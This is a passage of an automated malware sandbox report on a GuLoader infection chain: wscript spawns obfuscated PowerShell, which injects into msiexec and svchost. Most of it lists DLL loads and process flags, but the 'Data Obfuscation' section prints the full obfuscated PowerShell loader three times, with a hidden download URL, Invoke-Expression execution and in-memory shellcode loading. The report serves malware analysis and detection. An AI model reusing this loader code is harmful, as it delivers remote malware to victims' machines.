                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2132386041.0000000008750000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='D", "Unsupported parameter type 00000000")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 00000008.00000002.2135880774.0000000009729000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2113268820.0000000005FDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tenutos)$GlObAl:pROgRAMUDfRELSEN = [SYsTEM.TeXT.eNcodiNG]::AsCIi.GetsTRINg($ReALKreDiT)$GloBAl:nOnGasSY=$programUDfReLSen.SubSTring($bortfALdes50,$rULLE)<#Impignorate Yoder Pennigero
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Erhversindkomster $Manihot $kneelingly), (israelitize @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stikprvevarianternes = [AppDomain]::CurrentDomain.Get
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Piggier)), $Originalsprog).DefineDynamicModule($Gonozooid, $false).DefineType($Senat, $Interneringens, [System.MulticastDelegate])$Vul
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tenutos)$GlObAl:pROgRAMUDfRELSEN = [SYsTEM.TeXT.eNcodiNG]::AsCIi.GetsTRINg($ReALKreDiT)$GloBAl:nOnGasSY=$programUDfReLSen.SubSTring($bortfALdes50,$rULLE)<#Impignorate Yoder Pennigero
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9E3322 push eax; retf 3_2_00007FFD9B9E3331
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB8414 push es; ret 3_2_00007FFD9BAB860A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB7004 push es; ret 3_2_00007FFD9BAB7002
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB6FD9 push es; ret 3_2_00007FFD9BAB7002
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB820A push es; ret 3_2_00007FFD9BAB820C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB84C2 push es; ret 3_2_00007FFD9BAB860A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D62517 push ebp; retn 0007h8_2_04D62522
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D62527 push esi; retn 0007h8_2_04D62532
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A3A00 push ebp; iretd 10_3_041A3A04
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A2401 push esi; iretd 10_3_041A2405
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A2232 pushfd ; iretd 10_3_041A2235
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A2890 pushfd ; retf 10_3_041A2891
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A38D2 push edx; retf 10_3_041A38E0
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A03A2 pushfd ; retf 10_3_041A040D
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A29C0 pushfd ; iretd 10_3_041A29C1
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_3_041A39F5 push esp; ret 10_3_041A39F6
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C4920 push 0000002Eh; iretd 11_3_032C4922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C5F0C push es; iretd 11_3_032C5F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C1179 push FFFFFF82h; iretd 11_3_032C117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C278B push ebx; ret 11_3_032C28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C5FEE push FFFFFFD2h; retf 11_3_032C6011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C0FEA push eax; ret 11_3_032C0FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C5606 pushad ; retf 11_3_032C5619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C6012 push 00000038h; iretd 11_3_032C601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C225D push eax; ret 11_3_032C225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C58BC pushad ; ret 11_3_032C58C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C588E push eax; iretd 11_3_032C589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C28ED push ebx; ret 11_3_032C28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C18C0 push ebp; retf 11_3_032C18C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B812D0 push eax; ret 11_2_05B812FE
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
